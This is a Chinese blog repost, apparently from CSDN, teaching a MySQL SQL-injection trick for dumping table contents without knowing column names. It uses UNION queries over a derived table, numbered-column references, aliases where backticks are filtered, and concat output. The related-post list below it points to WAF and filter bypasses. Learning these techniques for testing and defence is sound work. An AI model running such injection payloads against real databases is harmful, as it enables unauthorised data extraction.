MySQL不知道列名情况下的注入

最新推荐文章于 2023-12-19 20:40:21 发布
最新推荐文章于 2023-12-19 20:40:21 发布
阅读量113 收藏
点赞数
分类专栏: Web漏洞 文章标签: mysql 数据库 sql
原文链接:https://blog.csdn.net/wuguojiuai/article/details/117864191?spm=1001.2014.3001.5501
版权

 

目录

 

          0×01 前提

          0×02 解决

2.1 正常的查询:

2.2 UNION查询:

2.3 数字对应列查询:

2.4 别名代替查询:

2.5 多列合并查询:

web安全学习了解: web渗透测试            
官网: 宣紫科技        

0×01 前提

以下情况适用于 Mysql < 5版本,或者在 Mysql >= 5 的版本[存在information_schema库],且已获取到库名和表名

① 当只能获取到表名,获取不到列名或者只能获取到无有效内容的列名情况【例如 id】

② 当希望通过information_schema库中的表去获取其他表的结构,即表名、列名等,但是这个库被WAF过滤掉的情况

其实个人感觉这个方法还是对 5 版本以下的实用性比较强一些,因为对我来说,一般遇到waf就放弃了(菜的真实23333)

0×02 解决

2.1 正常的查询:

以下是正常查询 test 库中的 user 表内容

select * from user;

2.2 UNION查询:

select 1,2,3,4 union select * from user;

2.3 数字对应列查询:

可以使用数字来对应列来进行查询,如 2 对应了表里面的 name 列

select `2` from (select 1,2,3,4 union select * from user)a;

2.4 别名代替查询:

当反引号 ` 不能使用的时候,可以使用别名来代替,如设置 2 的别名为 b

select b from (select 1,2 as b,3,4 union select * from user)a;

2.5 多列合并查询:

同上:这里反引号不能用的话,一样可以使用别名代替

select concat(`2`,0x3a,`3`) from (select 1,2,3,4 union select * from user)a limit 1,1;

宣紫科技
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mysql注入/PDO/变量注入
神隐哥的博客
03-02 534
简介 在mysql=>5版本中有information_schema数据库可以获取库名表名名,在sql注入中十分常见。当过滤or时。这个库就会被过滤。 在Mysql5.5.x之后。默认使用innodb作为存储引擎 1。 5.6.x之后。innodb加了两个表。分别为 innodb_index_stats innodb_table_stats 这两个表都会存储数据库和对应的表。但是没有 select group_concat(table_name) from mysql.innodb_ta
mysql练习注入语句
01-21
MySQL练习注入语句 MySQL是当今最流行的关系数据库管理系统之一,在Web应用程序中广泛应用。然而,MySQL也存在一些安全风险,例如SQL注入攻击。这里,我们将学习 MySQL 的一些基本知识点,包括MySQL数据库函数、...
MySQL在不知道情况下的注入详解
09-09
主要给大家介绍了关于MySQL在不知道情况下的注入的相关资料,文中通过示例代码介绍的非常详细,对大家学习或者使用mysql具有一定的参考学习价值,需要的朋友们下面来一起学习学习吧
mysql名未知注入_MySQL在不知道情况下的注入详解
weixin_28797889的博客
02-02 127
前言最近感觉脑子空空,全在为了刷洞去挖洞,还是回归技术的本身让自己舒服些。好了,下面话不多说了,来一起看看详细的介绍吧前提以下情况适用于 MySQL < 5版本,或者在 MySQL >= 5 的版本[存在information_schema库],且已获取到库名和表名① 当只能获取到表名,获取不到名或者只能获取到无有效内容的情况【例如 id】② 当希望通过information_s...
2021-7-26 [SWPU2019]Web1 知识点:mysql注入
m0_51326092的博客
07-26 404
文章目录前言前置知识解题过程总结 前言 其实这道题昨天就做到了,昨天不会做只能去看大佬题解,一开始自己尝试了一会以为是xss,结果看大佬博客发现是mysql的无注入,也是经典的留言板二次注入,o(╥﹏╥)o又学习到了新知识点,今天再来复现一遍!(好像BUU复现的题目查询到表名只有一种方法了,比赛时好像有多种) 借鉴的大佬博客: https://www.cnblogs.com/wangtanzhi/p/12241499.html https://www.cnblogs.com/Lee-404/p/128
mysql名未知注入_如何在不知道MySQL名的情况注入出数据?
weixin_36169900的博客
01-19 306
介绍你可能会遇到这样的情况:SQL注入时,需要从MySQL的某个表中导出某些数据。一般来说,要想导出数据,你必须知道表名、名,而这两个名字在某些情况下可能你并不知道。例如,对于版本小于5.0的MySQL数据库,以及部分有WAF干扰的版本大于5.0的MySQL数据库,你就无法轻易获得表名、名。在这种情况下,也许你会放弃,仅仅注入出数据库名字,证明漏洞存在就结束。但在这篇文章中,我将展示一种在不知...
第二节 Mysql注入有关知识点-01
09-15
Mysql注入有关知识点 Mysql注入是指攻击者通过构造恶意输入, Inject恶意数据到Mysql数据库中,达到未经授权的访问、控制或破坏数据库的行为。下面是Mysql注入有关知识点的总结: 1. Mysql 5.x数据结构 在Mysql ...
mysql注入提权命令
12-03
mysql 注入提权命令 ...mysql 注入提权命令可以通过 union select 来猜解 mysql 的版本、字段数目、数据库版本及当前用户、写权限、库、表、名、字段数和字段内容等信息,从而获取服务器的权限。
SQL注入绕过正则及无注入
最新发布
钟言的博客
12-19 1万+
本篇为SQL注入绕过正则表达式及无注入,详细内容包含了select\bNslS]bfrom正则 科学计数法绕过 过滤information 四、无注入 1、利用 join-using 注名 2、无名查询 五、报错注入7大常用函数 1.ST LatFromGeoHash() (mysql>=5.7.x)payload 2.ST LongFromGeoHash (mysql>=5.7.x) payload 3.GTID (MySQL >= 5.6.X - 显错
注入总结
D1stiny的博客
06-10 2728
爆表名库名 information_schema数据库是mysql中的信息数据库,它保存着mysql所有其他数据库的信息,包括了数据库名,表名,字段名等,但是如果waf过滤的这个数据库呢 schema_auto_increment_columns//该视图的作用简单来说就是用来对表自增ID的监控,可以通过该视图获取数据库的表名信息。 schema_table_statistics_with_buffer,x$schema_table_statistics_with_buffer//没有自增数据 mysq
名&位或注入随记
Aiwin的博客
02-07 848
名&位或注入随记
深入浅出带你学习无注入
郊眠寺
02-16 1013
今天给大家带来了无注入的知识点不知道大家学会了没有,简单来说无注入还是挺考察思维的需要我们构造查询的payload并写出脚本,有兴趣的小伙伴不妨自己去试一下,喜欢本文希望可以一键三连支持一下。最近找到一个VUE的文档,它将VUE的各个知识点进行了总结,整理成了《Vue 开发必须知道的36个技巧》。内容比较详实,对各个知识点的讲解也十分到位。
SQL中不知道名通过号求他们的和
feelcycle_07的专栏
06-14 891
m0_38051973 于 2018.06.13 22:44 提问 SQL中不知道名通过号求他们的和 10C sql 有表T 号 1 2 3 4 属性名 a b c d k 10 20 30 p 30 2 6 表中a为主键 怎么求a='k'时的第二和第三之和...
mysql sql注入例子_MySQL在不知道情况下的注入示例代码
weixin_42309178的博客
02-26 219
MySQL在不知道情况下的注入详解前言最近感觉脑子空空,全在为了刷洞去挖洞,还是回归技术的本身让自己舒服些。好了,下面话不多说了,来一起看看详细的介绍吧前提以下情况适用于 MySQL < 5版本,或者在 MySQL >= 5 的版本[存在information_schema库],且已获取到库名和表名① 当只能获取到表名,获取不到名或者只能获取到无有效内容的情况【例如 id】②...
知道名,查询指定表第几的数据
ReViSion的专栏
01-18 3158
问题:比如现在我不知道名,我想select 第3该怎么做?samfeng_2003(凤翼天翔) :create table t(col1 varchar(20),col3 varchar(30),col2 varchar(10),col4 varchar(50))insert tselect 1,df,34,56godeclare @t varchar(20)selec
SQL注入之无注入
weixin_46330722的博客
11-10 4065
注入概念原理利用 概念 在我们进行sql注入的时候,有时候information_schema这个库可能会因为过滤而无法调用,这是我们就不能通过这个库来查出表名和名。这时我们可以通过两种方法来查出表名: InnoDb引擎 从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储名。 sys数据库 在5.7以上
python读取excel,根据excel的名自动生成mysql表并写入
06-07
您可以使用 pandas 库读取 Excel 文件,并根据 Excel 文件中的名自动生成 MySQL 表。接下来,您可以将 DataFrame 数据写入该表中。首先,您需要安装 pymysql 和 xlrd 库,它们分别是 Python 连接 MySQL 数据库和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值